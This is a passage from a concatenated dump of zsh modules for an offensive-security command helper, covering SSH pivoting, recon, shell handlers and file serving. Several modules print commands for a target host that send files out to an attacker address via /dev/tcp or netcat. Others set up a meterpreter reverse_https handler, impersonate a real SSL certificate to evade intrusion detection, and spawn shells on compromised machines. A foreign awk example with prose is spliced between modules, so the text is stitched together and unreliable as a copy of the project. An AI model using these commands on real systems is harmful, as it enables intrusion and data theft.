/mnt path using sshfs qq-pivot-ssh-dynamic-proxy: uses remote as a dynamic proxy qq-pivot-ssh-remote-to-local: forwards remote port to local port qq-pivot-ssh-remote-to-local-burp: forwards remote port 8080 to local port 8080 DOC } qq-pivot-install() { __info "Running $0..."
__pkgs sshfs rsync } qq-pivot-mount-remote-sshfs() { __check-user local lm && __askpath lm LMOUNT /mnt local rm && __askvar rm RMOUNT / qq-vars-set-rhost mkdir -p ${lm} print -z "sshfs ${__USER}@${__RHOST}:${rm} ${lm}" } qq-pivot-ssh-dynamic-proxy() { __check-user qq-vars-set-rhost qq-vars-set-lport print -z "ssh -D ${__LPORT} -CqN ${__USER}@${__RHOST}" } qq-pivot-ssh-remote-to-local() { __check-user qq-vars-set-rhost qq-vars-set-rport qq-vars-set-lport print -z "ssh -R ${__LPORT}:127.0.0.1:${__RPORT} ${__USER}@${__RHOST}" } qq-pivot-ssh-remote-to-local-burp() { __check-user qq-vars-set-rhost print -z "ssh -R 8080:127.0.0.1:8080 ${__USER}@${__RHOST}" } ================================================ FILE: modules/qq-project-custom.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-project-custom ############################################################# qq-project-custom-help() { cat << "DOC" qq-project-custom ----------------- The qq-project-custom namespace provides commands to setup custom project directory structures and variables for users that have specific requirements. 
Variables --------- __PROJECT_ZD_CONSULTANT: a global variable for consultant name used in ZD projects __PROJECT_ZD_ROOT: a global variable for the project root folder used in ZD projects Commands -------- qq-project-custom-zd-start: scaffolds directory structure and logbook for "zd" projects qq-project-custom-zd-end: zips and removes directories and data for "zd" projects qq-project-custom-zd-root-set: sets the __PROJECT_ZD_ROOT variable qq-project-custom-zd-consultant-set: sets the __PROJECT_ZD_CONSULTANT variable DOC } export __PROJECT_ZD="" export __PROJECT_ZD_CONSULTANT="$(cat ${__GLOBALS}/__PROJECT_ZD_CONSULTANT 2> /dev/null)" export __PROJECT_ZD_ROOT="$(cat ${__GLOBALS}/__PROJECT_ZD_ROOT 2> /dev/null)" # each check calls the setter for its own variable, and the setters write the same ${__GLOBALS} file names that are read above __check-project-zd() { if [[ -z $__PROJECT_ZD_ROOT ]] then qq-project-custom-zd-root-set fi if [[ -z $__PROJECT_ZD_CONSULTANT ]] then qq-project-custom-zd-consultant-set fi } qq-project-custom-zd-root-set() { __warn "Enter the full path to the root folder of your projects." __prefill __PROJECT_ZD_ROOT DIR $HOME echo "${__PROJECT_ZD_ROOT}" > ${__GLOBALS}/__PROJECT_ZD_ROOT } qq-project-custom-zd-consultant-set() { __warn "Enter consultant name below." __askvar __PROJECT_ZD_CONSULTANT NAME echo "${__PROJECT_ZD_CONSULTANT}" > ${__GLOBALS}/__PROJECT_ZD_CONSULTANT } qq-project-custom-zd-start() { __check-project-zd local pid && __askvar pid "PROJECT ID" local pname && __askvar pname "PROJECT NAME" local fname="${pid}-${pname}-${__PROJECT_ZD_CONSULTANT// /}" local fullpath=${__PROJECT_ZD_ROOT}/${fname} #scaffold mkdir -p ${fullpath}/{burp/{log,intruder,http-requests},client-supplied-info/emails,files/{downloads,uploads},notes/screenshots,scans/{raw,pretty},ssl,tool-output} #set project to be tool-output __PROJECT=${fullpath}/tool-output # wanted this to be an optional step, sometimes I'll create folders in advance due to calls with clients ahead of the test or prep work local setlog && read "setlog?$fg[cyan]Add a log file for this project (y/n)?:$reset_color " case "$setlog" in y|Y ) qq-log-set ;; n|N ) echo "no" ;; * ) echo "" ;; esac } qq-project-custom-zd-end() { __check-project-zd __ask "Select a project folder: " local pd=$(__menu $(find $__PROJECT_ZD_ROOT -mindepth 1 -maxdepth 1 -type d)) __ok "Selected: ${pd}" # Task 1: delete all empty folders local df && read "df?$fg[cyan]Delete empty folders? (Y/n)?:$reset_color " if [[ "$df" =~ ^[Yy]$ ]] then find ${pd} -type d -empty -delete __ok "Empty folders deleted." fi # Task 2: create tree cd ${pd} tree -C -F -H ./ > ${pd}/tree.html [[ -f "${pd}/tree.html" ]] && __ok "Created ${pd}/tree.html." || __err "Failed creating ${pd}/tree.html" cd - > /dev/null 2>&1 # Task 3: zip up engagement folder (add -p with -mhe=on to 7z if the archive must be encrypted at rest) local zf=$(basename ${pd}) 7z a -t7z -m0=lzma2 -mx=9 -mfb=64 -md=1024m -ms=on ${__PROJECT_ZD_ROOT}/${zf}.7z ${pd} > /dev/null 2>&1 [[ -f ${__PROJECT_ZD_ROOT}/${zf}.7z ]] && __ok "Zipped files into ${__PROJECT_ZD_ROOT}/${zf}.7z." || __err "Failed to zip ${pd}" # Task 4: Delete engagement folder local rmp && read "rmp?$fg[cyan]Delete project folder? (Y/n)?:$reset_color " [[ "${rmp}" =~ ^[Yy]$ ]] && print -z "rm -rf ${pd}" __ok "Project ended."
} ================================================ FILE: modules/qq-project.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-project ############################################################# qq-project-help() { cat << "DOC" qq-project ---------- The project namespace provides commands that help with setting up scope for an engagement or bug bounty, as well as commands for syncing data and managing a VPS. Commands -------- qq-project-install: installs dependencies qq-project-scope: generate a scope regex by root word (matches all to the left and right) qq-project-rescope-txt: uses rescope to generate scope from a url qq-project-rescope-burp: uses rescope to generate burp scope (JSON) from a url qq-project-sync-remote-to-local: sync data from a remote server directory to a local directory using SSHFS qq-project-sync-local-file-to-remote: sync a local file to a remote server using rsync over SSH qq-project-google-domain-dyn: update IP address using Google domains hosted dynamic record DOC } qq-project-install() { __info "Running $0..." 
__pkgs sshfs rsync curl qq-install-golang go get -u github.com/root4loot/rescope } qq-project-scope() { __check-project __check-org print -z "echo \"^.*?${__ORG}\..*\$ \" >> ${__PROJECT}/scope.txt" } qq-project-rescope-burp() { __check-project __ask "Enter the URL to the bug bounty scope description" qq-vars-set-url mkdir -p ${__PROJECT}/burp print -z "rescope --burp -u ${__URL} -o ${__PROJECT}/burp/scope.json" } qq-project-sync-remote-to-local() { __warn "Enter your SSH connection username@remote_host" local ssh && __askvar ssh SSH __warn "Enter the full remote path to the directory you want to copy from" local rdir && __askvar rdir "REMOTE DIR" __warn "Enter the full local path to the directory to use as a mount point" local mnt && __askpath mnt "LOCAL MOUNT" /mnt __warn "Enter the full local path to the directory to sync the data to" local ldir && __askpath ldir "LOCAL DIR" $HOME sudo mkdir -p $mnt __ok "Mounting $rdir to $mnt ..." sudo sshfs ${ssh}:${rdir} ${mnt} __ok "Syncing data from $mnt to $ldir ..." sudo rsync -avuc ${mnt} ${ldir} __ok "Unmounting $mnt. ..."
sudo fusermount -u ${mnt} __ok "Sync Completed" } qq-project-sync-local-file-to-remote() { __warn "Enter your SSH connection username@remote_host" local ssh && __askvar ssh SSH __warn "Enter the full local path to the file you want to copy to your remote server" local lfile && __askpath lfile "LOCAL FILE" $HOME __warn "Enter the full remote path to the directory you want to copy the file to" local rdir && __askvar rdir "REMOTE DIR" __warn "Host key checking is disabled in this command; drop the two -o options once the server key is in known_hosts" print -z "rsync -avz -e \"ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null\" --progress $lfile $ssh:$rdir" } # curl -A sets the user agent (-a is append); credentials go in -u and the URL is quoted so the & does not background the command qq-project-google-domain-dyn() { local u && __askvar u USERNAME local p && __askvar p PASSWORD local d && __askvar d DOMAIN qq-vars-set-lhost print -z "curl -s -A \"${__UA}\" -u \"${u}:${p}\" \"https://domains.google.com/nic/update?hostname=${d}&myip=${__LHOST}\"" } ================================================ FILE: modules/qq-recon-domains.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-recon-domains ############################################################# qq-recon-domains-help() { cat << "DOC" qq-recon-domains ------------- The recon-domains namespace provides commands to recon horizontal domains of a root domain. All domains stored in $__PROJECT/domains/domains.txt and $__PROJECT/amass. You can sort unique this file in place with the "sfu" alias. Commands -------- qq-recon-domains-install: installs dependencies qq-recon-domains-amass-whois: find domains with whois qq-recon-domains-amass-asn: find domains by asn DOC } qq-recon-domains-install() { __info "Running $0..."
__pkgs amass } qq-recon-domains-amass-whois() { __check-project qq-vars-set-domain mkdir -p ${__PROJECT}/amass mkdir -p ${__PROJECT}/domains print -z "amass intel -active -whois -d ${__DOMAIN} -dir ${__PROJECT}/amass | tee -a ${__PROJECT}/domains/domains.txt" } qq-recon-domains-amass-asn() { __check-project __check-asn mkdir -p ${__PROJECT}/amass mkdir -p ${__PROJECT}/domains print -z "amass intel -active -asn ${__ASN} -dir ${__PROJECT}/amass | tee -a ${__PROJECT}/domains/domains.txt" } ================================================ FILE: modules/qq-recon-github.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-recon-github ############################################################# qq-recon-github-help() { cat << "DOC" qq-recon-github ------------ The recon-github namespace provides commands for the recon of github repos. All output will be stored under $__PROJECT/source Commands -------- qq-recon-github-install: installs dependencies qq-recon-github-user-repos: uses curl to get a list of repos for a github user qq-recon-github-endpoints: gets a list of urls from all repos of a domain on github qq-recon-github-gitrob: clones (in mem) repos and searches for github dorks qq-recon-github-api-set: set github API key global variable DOC } qq-recon-github-install() { __info "Running $0..." 
__pkgs curl jq python3 qq-install-golang qq-install-github-search qq-install-git-secrets qq-install-gitrob } # the GitHub API caps per_page at 100; add &page=2 and so on for users with more repos qq-recon-github-user-repos() { __check-project __check-user mkdir -p ${__PROJECT}/source print -z "curl -s \"https://api.github.com/users/${__USER}/repos?per_page=100\" | jq -r '.[].git_url' | tee -a ${__PROJECT}/source/${__USER}.txt " } qq-recon-github-endpoints() { __check-api-github __check-project qq-vars-set-domain mkdir -p ${__PROJECT}/source print -z "github-endpoints.py -t ${__API_GITHUB} -d ${__DOMAIN} | tee -a ${__PROJECT}/source/${__DOMAIN}.endpoints.txt " } qq-recon-github-gitrob() { __check-api-github __check-project __check-user local d=${__PROJECT}/source/${__USER} mkdir -p $d cp $HOME/go/src/github.com/codeEmitter/gitrob/filesignatures.json $d __info "Gitrob UI: http://127.0.0.1:9393/" print -z "pushd $d ;gitrob -in-mem-clone -save \"$d/output.json\" -github-access-token $__API_GITHUB ${__USER} && popd" } ================================================ FILE: modules/qq-recon-networks.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-recon-networks ############################################################# qq-recon-networks-help() { cat << "DOC" qq-recon-networks ------------- The recon-networks namespace provides commands to recon ASNs and IP networks for an organization. All network data is stored in $__PROJECT/networks. Commands -------- qq-recon-networks-install: installs dependencies qq-recon-networks-amass-asn: find asns by organization name qq-recon-networks-bgp: use the bgp.he.net website to find asns and networks qq-recon-networks-bgpview-ipv4: curl api.bgpview.io for ipv4 networks by asn qq-recon-networks-bgpview-ipv6: curl api.bgpview.io for ipv6 networks by asn DOC } qq-recon-networks-install() { __info "Running $0..."
__pkgs curl jq amass } qq-recon-networks-bgp() { __info "Search https://bgp.he.net/" } qq-recon-networks-amass-asn() { __check-project __check-org mkdir -p ${__PROJECT}/networks print -z "amass intel -org ${__ORG} | cut -d, -f1 | tee -a ${__PROJECT}/networks/asns.txt " } qq-recon-networks-bgpview-ipv4() { __check-project __check-asn mkdir -p ${__PROJECT}/networks print -z "curl -s https://api.bgpview.io/asn/${__ASN}/prefixes | jq -r '.data | .ipv4_prefixes | .[].prefix' | tee -a ${__PROJECT}/networks/ipv4.txt" } qq-recon-networks-bgpview-ipv6() { __check-project __check-asn mkdir -p ${__PROJECT}/networks print -z "curl -s https://api.bgpview.io/asn/${__ASN}/prefixes | jq -r '.data | .ipv6_prefixes | .[].prefix' | tee -a ${__PROJECT}/networks/ipv6.txt" } ================================================ FILE: modules/qq-recon-org.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-recon-org ############################################################# qq-recon-org-help() { cat << "DOC" qq-recon-org ------------ The recon-org namespace provides commands for the recon of an organization. Data from commands will be stored in $__PROJECT/recon. Commands -------- qq-recon-org-install: installs dependencies qq-recon-org-files-metagoofil: uses metagoofil to search and download files for a domain qq-recon-org-files-urls: extracts urls mentioning the domain from files in the current directory (strings + gf urls) qq-recon-org-wordlist-cewl: uses cewl to create a custom wordlist from a url qq-recon-org-theharvester: uses theHarvester to mine data about a target domain qq-recon-org-cse: reminder to build a Google custom search engine for the target DOC } qq-recon-org-install() { __info "Running $0..."
__pkgs whois metagoofil cewl theharvester } qq-recon-org-files-metagoofil() { __check-project __check-ext-docs qq-vars-set-domain mkdir -p ${__PROJECT}/recon/files print -z "metagoofil -u \"${__UA}\" -d ${__DOMAIN} -t ${__EXT_DOCS} -o ${__PROJECT}/recon/files" } qq-recon-org-files-urls() { __check-project qq-vars-set-domain mkdir -p ${__PROJECT}/recon print -z "strings * | gf urls | grep $__DOMAIN | tee -a ${__PROJECT}/recon/urls.txt" } qq-recon-org-wordlist-cewl() { __check-project qq-vars-set-url mkdir -p ${__PROJECT}/recon print -z "cewl -a -d 3 -m 5 -u \"${__UA}\" -w ${__PROJECT}/recon/cewl.txt ${__URL}" } qq-recon-org-theharvester() { __check-project qq-vars-set-domain mkdir -p ${__PROJECT}/recon print -z "theHarvester -d ${__DOMAIN} -l 50 -b all -f ${__PROJECT}/recon/harvested.txt" } qq-recon-org-cse() { __info "Use https://cse.google.com/cse/all to create a custom search engine" } ================================================ FILE: modules/qq-recon-subs.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-recon-subs ############################################################# qq-recon-subs-help() { cat << "DOC" qq-recon-subs ------------- The recon-subs namespace provides commands to recon vertical sub-domains of a root domain. All subdomains for a domain will be stored in $__PROJECT/amass and $__PROJECT/domains/$DOMAIN/subs.txt. You can sort unique this file in place with the "sfu" alias.

Commands
--------
qq-recon-subs-install:             installs dependencies

Commands - enumeration
----------------------
qq-recon-subs-amass-enum:          enumerate subdomains into amass db (api keys help)
qq-recon-subs-amass-diff:          track changes between last 2 enumerations using amass db
qq-recon-subs-amass-names:         list gathered subs in the amass db
qq-recon-subs-crt.sh:              gather subdomains from crt.sh
qq-recon-subs-subfinder:           gather subdomains from sources (api keys help)
qq-recon-subs-assetfinder:         gather subdomains from sources (api keys help)
qq-recon-subs-wayback:             gather subdomains from Wayback Machine

Commands - brute force
----------------------
qq-recon-subs-brute-massdns:       try to resolve a list of subdomains generated for brute forcing
qq-recon-subs-gen-wordlist:        generate a wordlist of possible sub domains

Commands - processing
---------------------
qq-recon-subs-resolve-massdns:     resolve a file of subdomains using massdns
qq-recon-subs-resolve-parse:       parse resolved.txt into A, CNAME and IP's

DOC
}

qq-recon-subs-install() {
  __info "Running $0..."
  __pkgs gobuster amass curl wordlists seclists dnsrecon dnsutils
  qq-install-golang
  go get -u github.com/projectdiscovery/subfinder/cmd/subfinder
  go get -u github.com/tomnomnom/assetfinder
  go get -u github.com/tomnomnom/waybackurls
  qq-install-massdns
}

qq-recon-subs-amass-enum() {
  __check-project
  qq-vars-set-domain
  mkdir -p ${__PROJECT}/amass
  print -z "amass enum -active -ip -d ${__DOMAIN} -dir ${__PROJECT}/amass"
}

qq-recon-subs-amass-diff() {
  __check-project
  qq-vars-set-domain
  mkdir -p ${__PROJECT}/amass
  print -z "amass track -d ${__DOMAIN} -last 2 -dir ${__PROJECT}/amass"
}

qq-recon-subs-amass-names() {
  __check-project
  qq-vars-set-domain
  mkdir -p ${__PROJECT}/amass
  print -z "amass db -names -d ${__DOMAIN} -dir ${__PROJECT}/amass | tee -a $(__dompath)/subs.txt"
}

qq-recon-subs-crt.sh() {
  __check-project
  qq-vars-set-domain
  print -z "curl -s 'https://crt.sh/?q=%.${__DOMAIN}' | grep -i \"${__DOMAIN}\" | cut -d '>' -f2 | cut -d '<' -f1 | grep -v \" \" | sort -u | tee -a $(__dompath)/subs.txt "
}

qq-recon-subs-subfinder() {
  __check-project
  qq-vars-set-domain
  __check-threads
  print -z "subfinder -t ${__THREADS} -d ${__DOMAIN} -nW -silent | tee -a $(__dompath)/subs.txt"
}

qq-recon-subs-assetfinder() {
  __check-project
  qq-vars-set-domain
  print -z "echo ${__DOMAIN} | assetfinder --subs-only | tee -a $(__dompath)/subs.txt"
}

qq-recon-subs-wayback() {
  __check-project
  qq-vars-set-domain
  # the cut delimiter is single-quoted so it does not terminate the double-quoted command string
  print -z "echo ${__DOMAIN} | waybackurls | cut -d '/' -f3 | sort -u | grep -v \":80\" | tee -a $(__dompath)/subs.txt"
}

qq-recon-subs-resolve-massdns() {
  __check-project
  __check-resolvers
  qq-vars-set-domain
  print -z "massdns -r ${__RESOLVERS} -s 100 -c 3 -t A -o S -w $(__dompath)/resolved.txt $(__dompath)/subs.txt"
}

qq-recon-subs-brute-massdns() {
  __check-project
  __check-resolvers
  qq-vars-set-domain
  __ask "Select the file containing a custom wordlist for ${__DOMAIN} (qq-recon-subs-gen-wordlist)"
  local f && __askpath f FILE $(__dompath)
  print -z "massdns -r ${__RESOLVERS} -s 100 -c 3 -t A -o S -w $(__dompath)/resolved-brute.txt $f"
}

qq-recon-subs-resolve-parse() {
  __check-project
  qq-vars-set-domain
  __info "Generating files resolved-*.txt"
  grep -ie "CNAME" $(__dompath)/resolved.txt | sort -u > $(__dompath)/resolved-CNAME.txt
  grep -v "CNAME" $(__dompath)/resolved.txt | sort -u > $(__dompath)/resolved-A.txt
  grep -v "CNAME" $(__dompath)/resolved.txt | sort -u | cut -d' ' -f3 | sort -u > $(__dompath)/resolved-IP.txt
}

qq-recon-subs-gen-wordlist() {
  __check-project
  qq-vars-set-domain
  local f && __askpath f FILE /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
  print -z "for s in \$(cat ${f}); do echo \$s.${__DOMAIN} >> $(__dompath)/subs.wordlist.txt; done"
}

================================================
FILE: modules/qq-scripts.zsh
================================================
#!/usr/bin/env zsh

#############################################################
# qq-scripts
#############################################################

# qq-scripts-help() {
#   cat << "DOC"
# qq-scripts
# -------
# The scripts namespace runs scripts from the quiver
# scripts directory.
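The resolve-parse step above splits massdns output with grep and cut, which treats every non-CNAME record (AAAA included) as an A record and keeps the trailing dot massdns prints on names. The following is an added example, not code from the quiver project, of the same post-processing done per record type on a constructed massdns "-o S" sample; file names, the sample records and the documentation-range addresses are assumptions of the example.

```shell
#!/bin/sh
# Added example (not part of quiver): parse massdns "-o S" simple output into
# per-record-type lists, as qq-recon-subs-resolve-parse does, but keeping
# A, AAAA and CNAME records apart and stripping the trailing dots massdns prints.

# Constructed sample of massdns -o S output (documentation ranges, not real hosts).
SAMPLE_RESOLVED='www.example.com. A 192.0.2.10
www.example.com. A 192.0.2.11
cdn.example.com. CNAME cdn.edge.example.net.
api.example.com. AAAA 2001:db8::1
api.example.com. A 192.0.2.10
www.example.com. A 192.0.2.10
this line is not a record'

# parse_resolved IN_FILE OUT_DIR
# Writes OUT_DIR/resolved-{A,AAAA,CNAME,IP}.txt, each sorted and de-duplicated.
parse_resolved() {
    in="$1"
    out="$2"
    mkdir -p "$out"
    # Only three-field "name type value" records are accepted; anything else
    # (massdns warnings, truncated lines) is skipped instead of leaking into the lists.
    awk -v out="$out" '
        NF != 3 { next }
        { sub(/\.$/, "", $1); sub(/\.$/, "", $3) }
        $2 == "A"     { print $1, $3 > (out "/resolved-A.txt");    print $3 > (out "/resolved-IP.txt") }
        $2 == "AAAA"  { print $1, $3 > (out "/resolved-AAAA.txt"); print $3 > (out "/resolved-IP.txt") }
        $2 == "CNAME" { print $1, $3 > (out "/resolved-CNAME.txt") }
    ' "$in"
    # sort -u in place (sort reads its whole input before writing the -o target)
    for t in A AAAA CNAME IP; do
        [ -f "$out/resolved-$t.txt" ] || : > "$out/resolved-$t.txt"
        sort -u -o "$out/resolved-$t.txt" "$out/resolved-$t.txt"
    done
}

# count_records OUT_DIR TYPE -> number of unique records of that type
count_records() {
    wc -l < "$1/resolved-$2.txt" | tr -d ' '
}

# demo_parse -> prints the directory holding the parsed lists for the sample
demo_parse() {
    tmp=$(mktemp -d)
    printf '%s\n' "$SAMPLE_RESOLVED" > "$tmp/resolved.txt"
    parse_resolved "$tmp/resolved.txt" "$tmp"
    echo "$tmp"
}
```

Run `d=$(demo_parse)` and inspect `$d/resolved-*.txt`; the same function can be pointed at `$(__dompath)/resolved.txt` and `$(__dompath)` in a quiver project.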
# ** IN DEVELOPMENT, NOT READY FOR USE **
#
# Commands
# --------
# qq-scripts-recon:      a zsh recon script
# qq-scripts-webrecon:   a zsh webrecon script
#
# DOC
# }

# qq-scripts-recon() {
#   local d && read "d?$(__cyan DOMAIN: )"
#   local o && read "o?$(__cyan ORG: )"
#   local w && read "w?$(__cyan WORKING\(DIR\): )"
#   print -z "zsh ${__SCRIPTS}/recon.zsh ${d} \"${o}\" \"${w}\""
# }

# qq-scripts-webrecon() {
#   local f=$(rlwrap -S "$(__cyan FILE:\(DOMAINS\))" -e '' -c -o cat)
#   local w && read "w?$(__cyan WORKING\(DIR\): )"
#   pushd ${w}
#   print -z "zsh ${__SCRIPTS}/webrecon.zsh ${f}"
#   popd
# }

================================================
FILE: modules/qq-shell-handlers-msf.zsh
================================================
#!/usr/bin/env zsh

#############################################################
# qq-shell-handlers-msf
#############################################################

qq-shell-handlers-msf-help() {
  cat << "DOC"
qq-shell-handlers-msf
---------------------
The shell-handlers-msf namespace provides commands for spawning reverse shell connections using metasploit.

Commands
--------
qq-shell-handlers-msf-install:           installs dependencies
qq-shell-handlers-msf-ssl-gen:           impersonate a real SSL certificate for use in reverse shells
qq-shell-handlers-msf-w64-multi-https:   multi-handler for staged windows/x64/meterpreter/reverse_https payload

DOC
}

qq-shell-handlers-msf-install() {
  __info "Running $0..."
  __pkgs metasploit-framework
}

qq-shell-handlers-msf-ssl-gen() {
  __ask "Enter the hostname of the site to impersonate"
  local r && __prefill r SITE aka.ms
  local cmd="use auxiliary/gather/impersonate_ssl; set RHOST ${r}; run; exit "
  __info "Use qq-vars-global-set-shell-ssl-cert to set the path of the generated .pem file"
  print -z "msfconsole -n -q -x \"${cmd}\" "
}

qq-shell-handlers-msf-w64-multi-https() {
  qq-vars-set-lhost
  qq-vars-set-lport
  # every msfconsole command must end with ";" so the values are not run together
  __msf << VAR
use exploit/multi/handler;
set PAYLOAD windows/x64/meterpreter/reverse_https;
set LHOST ${__LHOST};
set LPORT ${__LPORT};
set HANDLERSSLCERT ${__SHELL_SSL_CERT};
set EXITONSESSION false;
run;
exit
VAR
}

================================================
FILE: modules/qq-shell-handlers.zsh
================================================
#!/usr/bin/env zsh

#############################################################
# qq-shell-handlers
#############################################################

qq-shell-handlers-help() {
  cat << "DOC"
qq-shell-handlers
-----------------
The shell-handlers namespace provides commands for spawning reverse shell connections.

Commands
--------
qq-shell-handlers-install:       installs dependencies
qq-shell-handlers-msf-ssl-gen:   impersonate a real SSL certificate for use in reverse shells (see qq-shell-handlers-msf-help)
qq-shell-handlers-nc:            netcat TCP listener on __LPORT
qq-shell-handlers-ncrl:          netcat TCP listener on __LPORT wrapped in rlwrap for line editing and history
qq-shell-handlers-nc-udp:        netcat UDP listener on __LPORT
qq-shell-handlers-socat:         socat TCP listener on __LPORT attached to the current tty

DOC
}

qq-shell-handlers-install() {
  __info "Running $0..."
  __pkgs netcat socat
}

# netcat

qq-shell-handlers-nc() {
  qq-vars-set-lport
  print -z "nc -nlvp ${__LPORT}"
}

qq-shell-handlers-ncrl() {
  qq-vars-set-lport
  print -z "rlwrap nc -nlvp ${__LPORT}"
}

qq-shell-handlers-nc-udp() {
  qq-vars-set-lport
  print -z "nc -nlvu ${__LPORT}"
}

# socat

qq-shell-handlers-socat() {
  qq-vars-set-lport
  print -z "socat file:`tty`,raw,echo=0 tcp-listen:${__LPORT}"
}

================================================
FILE: modules/qq-shell-tty.zsh
================================================
#!/usr/bin/env zsh

#############################################################
# qq-shell-tty
#############################################################

qq-shell-tty-help() {
  cat << "DOC"
qq-shell-tty
------------
The shell-tty namespace provides commands for fixing interactive command/reverse shells.

Commands
--------
qq-shell-tty-python2:   command to spawn a tty shell
qq-shell-tty-python3:   command to spawn a tty shell
qq-shell-tty-perl:      command to spawn a tty shell
qq-shell-tty-ruby:      command to spawn a tty shell
qq-shell-tty-lua:       command to spawn a tty shell
qq-shell-tty-expect:    command to spawn a tty shell

DOC
}

qq-shell-tty-python2() {
  __ok "Copy the commands below and use on the remote system"
  cat << "DOC"
python -c 'import pty;pty.spawn("/bin/sh")'
DOC
}

qq-shell-tty-python3() {
  __ok "Copy the commands below and use on the remote system"
  cat << "DOC"
python3 -c 'import pty;pty.spawn("/bin/sh")'
DOC
}

qq-shell-tty-perl() {
  __ok "Copy the commands below and use on the remote system"
  cat << "DOC"
perl -e 'exec "/bin/sh";'
DOC
}

qq-shell-tty-ruby() {
  __ok "Copy the commands below and use on the remote system"
  cat << "DOC"
ruby: exec "/bin/sh"
DOC
}

qq-shell-tty-lua() {
  __ok "Copy the commands below and use on the remote system"
  cat << "DOC"
lua: os.execute('/bin/sh')
DOC
}

qq-shell-tty-expect() {
  __ok "Copy the commands below and use on the remote system"
  cat << "DOC"
/usr/bin/expect sh
DOC
}

================================================
FILE: modules/qq-srv.zsh
================================================
#!/usr/bin/env zsh

#############################################################
# qq-srv
#############################################################

qq-srv-help() {
  cat << "DOC"
qq-srv
-------
The srv namespace provides commands for hosting local services
such as web, ftp, smb and other services for data exfil or transfer.

Commands
--------
qq-srv-install:         install dependencies
qq-srv-web:             hosts a python3 web server in current dir
qq-srv-ftp:             hosts a python3 ftp server in current dir
qq-srv-smb:             hosts an impacket smb server in current dir
qq-srv-tftp:            starts the atftpd service in /srv/tftp
qq-srv-smtp:            hosts a python3 smtp server in current dir
qq-srv-updog:           hosts an updog web server in current dir
qq-srv-nc-tar:          hosts a netcat server > tar file in current dir
qq-srv-nc-file:         hosts a netcat server > file in current dir
qq-srv-nc-b64:          hosts a netcat server > base64-decoded file in current dir
qq-srv-web-hosted:      hosts a python3 web server in /srv, port as $1
qq-srv-php-hosted:      hosts a php web server in /srv, port as $1
qq-srv-ftp-hosted:      hosts a python3 ftp server in /srv
qq-srv-updog-hosted:    hosts an updog web server in /srv

DOC
}

qq-srv-install() {
  __info "Running $0..."
  __pkgs netcat atftpd
  __pkgs php python3 python3-pip python3-smb python3-pyftpdlib impacket-scripts
  sudo pip3 install updog
}

qq-srv-web() print -z "sudo python3 -m http.server 80"
qq-srv-ftp() print -z "sudo python3 -m pyftpdlib -p 21 -w"
qq-srv-smb() print -z "sudo impacket-smbserver -smb2support F ."
qq-srv-tftp() print -z "sudo service atftpd start"
qq-srv-smtp() print -z "sudo python3 -m smtpd -c DebuggingServer -n 0.0.0.0:25"

qq-srv-web-hosted() {
  __info "Serving content from /srv"
  pushd /srv &> /dev/null
  # port defaults to 80 when no argument is given
  sudo python3 -m http.server ${1:-80}
  popd &> /dev/null
}

qq-srv-php-hosted() {
  __info "Serving content from /srv"
  pushd /srv &> /dev/null
  sudo php -S 0.0.0.0:${1:-80}
  popd &> /dev/null
}

qq-srv-ftp-hosted() {
  __info "Serving content from /srv"
  pushd /srv &> /dev/null
  sudo python3 -m pyftpdlib -p 21 -w
  popd &> /dev/null
}

qq-srv-updog() {
  # -p is the port; the random value is the access password (--password), not a second port
  print -z "updog -p 443 --ssl --password $(__rand 10)"
}

qq-srv-updog-hosted() {
  __info "Serving content from /srv"
  sudo updog -p 443 --ssl -d /srv
}

qq-srv-nc-tar() {
  qq-vars-set-lhost
  qq-vars-set-lport
  __cyan "Use the command below on the target system: "
  echo "tar cfv - /path/to/send | nc ${__LHOST} ${__LPORT}"
  print -z "nc -nvlp ${__LPORT} | tar xfv -"
}

qq-srv-nc-file() {
  qq-vars-set-lhost
  qq-vars-set-lport
  __cyan "Use the command below on the target system: "
  echo "cat FILE > /dev/tcp/${__LHOST}/${__LPORT}"
  print -z "nc -nvlp ${__LPORT} -w 5 > incoming.txt"
}

qq-srv-nc-b64() {
  qq-vars-set-lhost
  qq-vars-set-lport
  __cyan "Use the command below on the target system: "
  echo "openssl base64 -in FILE > /dev/tcp/${__LHOST}/${__LPORT}"
  print -z "nc -nvlp ${__LPORT} -w 5 > incoming.b64 && openssl base64 -d -in incoming.b64 -out incoming.txt"
}

================================================
FILE: modules/qq-vars-global.zsh
================================================
#!/usr/bin/env zsh

#############################################################
# qq-vars-global
#############################################################

qq-vars-global-help() {
  cat << "DOC"
qq-vars-global
--------------
The vars global namespace manages environment variables
used in other functions that are saved between sessions.
Values are stored as files in the .quiver/globals directory and can contain
sensitive information like API keys. These variables are used to supply
arguments to commands in other modules.

Variables
---------
__IMPACKET:         full path to the python3 impacket examples directory
__EXT_PHP:          a list of file extensions used on PHP webservers
__EXT_DOCS:         a list of common documents file types
__API_GITHUB:       your personal Github API key
__RESOLVERS:        path to public resolvers file
__NOTES:            path to the directory containing your markdown notes for qq-notes
__MNU_UA:           path to the file containing user-agent strings
__MNU_WORDLISTS:    path to the file containing a list of favorite wordlists
__TCP_PORTS:        path to the file of favorite TCP ports
__SHELL_SSL_CERT:   path to the file of an impersonated SSL cert used for reverse shell IDS evasion
__ALIASES:          path to the file containing aliases that will be sourced

Commands
--------
qq-vars-global:          list all current global variable values
qq-vars-global-set-*:    used to set and save each individual variable

DOC
}

qq-vars-global() {
  echo "$(__cyan IMPACKET: ) ${__IMPACKET}"
  echo "$(__cyan EXT_PHP: ) ${__EXT_PHP}"
  echo "$(__cyan EXT_DOCS: ) ${__EXT_DOCS}"
  echo "$(__cyan API_GITHUB: ) ${__API_GITHUB}"
  echo "$(__cyan NOTES: ) ${__NOTES}"
  echo "$(__cyan RESOLVERS: ) ${__RESOLVERS}"
  echo "$(__cyan MNU_UA: ) ${__MNU_UA}"
  echo "$(__cyan MNU_WORDLISTS: ) ${__MNU_WORDLISTS}"
  echo "$(__cyan TCP_PORTS: ) ${__TCP_PORTS}"
  echo "$(__cyan SHELL_SSL_CERT: ) ${__SHELL_SSL_CERT}"
  echo "$(__cyan ALIASES: ) ${__ALIASES}"
}

########## __IMPACKET

